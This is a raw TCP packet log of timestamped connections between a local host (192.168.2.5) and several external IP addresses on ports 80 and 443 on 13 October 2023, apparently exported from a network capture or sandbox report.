Oct 13, 2023 15:21:12.586199999 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.586611032 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.586671114 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.587140083 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.587172031 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.587188959 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.587208986 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.587215900 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.587260962 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.587451935 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.587515116 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.587552071 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.587565899 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.587584019 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.587605000 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.587622881 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.588042974 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.588076115 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.588102102 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.588124037 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.588545084 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.588582039 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.588602066 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.588632107 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.589030027 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.589066982 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.589083910 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.589114904 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.589593887 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.589628935 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.589653969 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.589688063 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.590106964 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.590138912 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.590161085 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.590173960 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.590179920 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.590207100 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.590224028 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.590248108 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.590579987 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.590627909 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.590679884 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.591018915 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.591052055 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.591103077 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.591536045 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.591567993 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.591685057 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.591748953 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.592473984 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.636889935 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.636898994 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.636986971 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.637326956 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.637332916 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.637387991 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.637955904 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.637962103 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.638017893 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.638850927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.638858080 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.638931990 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.639758110 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.639817953 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.640613079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.640671968 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.640877008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.640934944 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.641707897 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.641766071 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.642493010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.642549992 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.643426895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.643486023 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.644610882 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.644682884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.645241022 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.645303965 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.645318031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.645374060 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.645404100 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.646226883 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.646281004 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.646296024 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.646346092 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.647125959 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.647185087 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.648273945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.648325920 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.648355961 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.648374081 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.648396969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.696810961 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.773972034 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.774055004 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.798763990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.798866034 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.798880100 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.798955917 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.798990965 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.799510002 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.799580097 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.799607038 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.799658060 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.800442934 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.800498009 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.801328897 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.801378965 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.801503897 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.801549911 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.802373886 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.802423954 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.803345919 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.803390980 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.804188967 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.804253101 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.805116892 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.805166006 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.805274010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.805318117 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.806720018 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.806772947 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.807085037 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.807131052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.808010101 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.808068037 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.808881044 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.808928013 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.809853077 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.809905052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.809928894 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.809973955 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.810817003 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.810868025 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.811736107 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.811793089 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.812650919 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.812704086 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.812741041 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.812787056 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.816422939 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.816440105 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.816517115 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.816524029 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.816561937 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.817439079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.817502975 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.820307016 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.820322990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.820375919 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.820383072 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.820419073 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.823947906 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.823962927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.824019909 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.824024916 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.824071884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.826795101 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.826809883 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.826877117 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.826883078 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.826925993 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.829461098 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.829476118 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.829528093 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.829539061 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.829571962 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.833128929 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.833143950 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.833224058 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.833230972 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.833276987 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.835969925 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.835985899 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.836049080 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.836055040 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.836091995 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.856014013 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:12.856095076 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:12.856178999 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:12.858427048 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.858535051 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.860008955 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.860073090 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.860964060 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.861025095 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.861877918 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.861932993 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.863379955 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.863436937 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.864404917 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.864466906 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.865758896 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.865793943 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.865816116 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.865849972 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.867453098 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:12.867491007 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:12.903481007 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.903490067 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.903512955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.903579950 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.903594017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.903615952 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.903635025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.904992104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.905008078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.905049086 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.905056000 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.905075073 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.905092001 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.907099009 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.907114029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.907151937 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.907159090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.907182932 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.907192945 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.909102917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.909118891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.909167051 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.909173012 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.909209967 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.926090956 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.926184893 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.927402973 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.927463055 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.927819014 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.927875042 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.928922892 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.928957939 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.928980112 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.929012060 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.930907965 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.930967093 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.931508064 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.931562901 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.932384014 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.932434082 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.932879925 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.932933092 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.933888912 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.933943987 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.934307098 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.934360027 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.934900999 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.934957027 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.935524940 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.935543060 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.935595989 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.935610056 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.935642958 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.935658932 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.936182022 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.936214924 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.936238050 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.936268091 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.936367035 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.936420918 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.937407970 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.937439919 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.937469006 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.937501907 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.937947035 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.938004971 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.938448906 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.938507080 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.938827991 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.938879967 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.939423084 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.939476967 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.939910889 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.939948082 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.939965963 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.939995050 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.940445900 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.940496922 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.940913916 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.940947056 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.940968990 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.941000938 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.941404104 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.941457033 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.941905975 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.941940069 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.941957951 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.941992998 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.942384005 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.942437887 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.942948103 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.942980051 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.943002939 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.943034887 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.943459034 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.943516970 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.943531990 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.943579912 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.943978071 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944010973 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944031000 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944046974 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944051981 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944097996 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944322109 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944376945 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944422960 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944454908 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944474936 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944494009 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944885015 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944927931 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.944942951 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.944972992 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.945426941 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.945458889 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.945485115 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.945518017 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.945907116 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.945964098 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.946003914 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.946057081 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.946398020 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.946460009 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.946477890 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.946531057 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947005033 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.947062969 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947097063 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.947129965 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.947144985 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947174072 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947514057 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.947546959 CEST	80	49738	187.18.108.158	192.168.2.5
